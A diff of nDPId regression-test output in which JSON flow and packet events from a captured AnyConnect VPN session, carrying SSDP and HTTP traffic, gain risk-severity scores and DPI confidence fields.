 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1569687268789,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1569687268789,"pkt":"NDY7z3UoLH6BsEqhCABFAABMkFUAAPcRuegIJWZbCgAA4wG701sAOF8pFgEAAAAAAAAAAAAAIwMAABcAAAAAAAAAFwEAFGKRvPEadu7FYjYhjKxM1MN8EkEd"}
 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1569687268790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"ts_msec":1569687268790,"pkt":"LH6BsEqhNDY7z3UoCABFAACTQPwAAEARv\/sKAADjCCVmW9NbAbsAf9nwFgEAAAAAAAAAAAEAagEAAF4AAQAAAAAAXgEA7YnEaZ6hZImmhCHr0JUfCBctWVvywlB71JRnxl7mI4ogm7BxyKgEQGFPg0eizi7+AVQMevU74i4erAc5hyngJu8UYpG88Rp27sViNiGMrEzUw3wSQR0AAgA5AQA="}
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687268746,"flow_last_seen":1569687268850,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":672,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1569687268850,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687268746,"flow_last_seen":1569687268850,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":672,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1569687268850,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269094,"flow_last_seen":1569687269094,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1569687269094,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1569687269094,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"ts_msec":1569687269094,"pkt":"LH6BsEqhNDY7z3UoCABFAAAg7WwAAEAReH0KAADjCgAAAc1zAMAADBGuCAEDEA=="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269223,"flow_last_seen":1569687269223,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1569687269223,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1569687269223,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"ts_msec":1569687269223,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj6FAAEARlH8KAACXCgAA4wds4MsBP0SkSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269223,"flow_last_seen":1569687269223,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1569687269223,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269223,"flow_last_seen":1569687269223,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1569687269223,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1569687269559,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1569687269559,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKtRAAAAERCTYKAADj7\/\/\/+uDLB2wAtl89TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269561,"flow_last_seen":1569687269561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569687269561,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1569687269561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569687269561,"pkt":"pHczjPFANDY7z3UoCABFAABAAABAAEAGJUEKAADjCgAAld56H0gqQcOaAAAAALAC\/\/9B2AAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"}
@@ -279,121 +279,121 @@
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1569687269562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569687269562,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl957H3yCfYpEAAAAALAC\/\/8iuwAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1569687269563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569687269563,"pkt":"NDY7z3UopHczjPFACABFAAA8AABAAEAGJUUKAACVCgAA4x9I3np8gG11KkHDm6ASOJBP2wAAAgQFtAQCCAoAIeBIHA3YAQEDAwY="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1569687269563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687269563,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld56H0gqQcObfIBtdoAQEBWnIAAAAQEIChwN2AIAIeBI"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269561,"flow_last_seen":1569687269563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":251,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1569687269563,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269561,"flow_last_seen":1569687269563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":251,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1569687269563,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1569687269567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569687269567,"pkt":"NDY7z3Uo2DE0IHf7CABFAAA8AABAAEAGJUMKAACXCgAA4x983nsgu1W7gn2KRaASqbA3ZQAAAgQFtAQCCAoGktWOHA3YAQEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1569687269567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687269567,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl957H3yCfYpFILtVvIAQEBX\/yAAAAQEIChwN2AUGktWO"}
-00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269562,"flow_last_seen":1569687269567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1569687269567,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.0.0.151","url":"10.0.0.151:8060\/dial\/dd.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/77.0.3865.90 Safari\/537.36"}}
+01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269562,"flow_last_seen":1569687269567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1569687269567,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.0.0.151","url":"10.0.0.151:8060\/dial\/dd.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/77.0.3865.90 Safari\/537.36"}}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1569687269598,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"ts_msec":1569687269598,"pkt":"LH6BsEqhNDY7z3UoCABFAAAg\/t4AAEARZwsKAADjCgAAAc1zAMAADAmuEAEDEA=="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687269716,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1569687269716,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"ts_msec":1569687269716,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA48KY4MsCCjHASFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MjkgR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687269716,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687269716,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1569687270260,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"ts_msec":1569687270260,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj91AAEARlEMKAACXCgAA4wds4MsBP0SkSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="}
 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1569687270560,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1569687270560,"pkt":"AQBef\/\/6NDY7z3UoCABFAADK9bsAAAERyIoKAADj7\/\/\/+uDLB2wAtl89TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"}
 00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1569687270729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"ts_msec":1569687270729,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTkARAAEARlBwKAACXCgAA4wds4MsBP0SkSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":822,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687270740,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1569687270740,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"ts_msec":1569687270740,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA47wm4MsCCkExSFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MzAgR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687270740,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687270740,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1569687271101,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"ts_msec":1569687271101,"pkt":"LH6BsEqhNDY7z3UoCABFAAAgLGIAAEAROYgKAADjCgAAAc1zAMAADBGuCAEDEA=="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":885,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687271764,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
